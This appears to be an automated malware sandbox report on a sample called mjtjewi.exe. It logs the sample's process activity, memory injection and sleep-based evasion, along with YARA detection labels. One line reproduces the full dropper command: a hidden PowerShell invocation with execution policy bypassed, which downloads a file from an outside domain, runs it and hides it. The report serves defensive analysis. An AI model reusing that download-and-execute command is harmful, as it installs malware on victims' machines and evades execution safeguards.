Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 2F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 4F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 5550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 8A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: AC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: BC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: C120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: D120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 5550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 6680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 7A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 8A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory allocated: 9A10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3537			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6313			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe TID: 1084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe TID: 64	Thread sleep time: -900000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000006.00000002.1470908849.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000007.00000002.1473273192.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63BC6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]

6_2_0040317B

Source: C:\Users\user\Desktop\mjtjewi.exe

Code function: 6_2_00402B7C GetProcessHeap,HeapAlloc,

6_2_00402B7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\mjtjewi.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_4552.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: unknown

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Memory written: C:\Users\user\Desktop\mjtjewi.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\OpenWith.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe "C:\Users\user\Desktop\mjtjewi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Process created: C:\Users\user\Desktop\mjtjewi.exe C:\Users\user\Desktop\mjtjewi.exe	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -windowstyle hidden -command openwith.exe;(new-object system.net.webclient).downloadfile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbafrawyegfyaugeygywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').attributes += 'hidden';

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mjtjewi.exe	Queries volume information: C:\Users\user\Desktop\mjtjewi.exe VolumeInformation	Jump to behavior
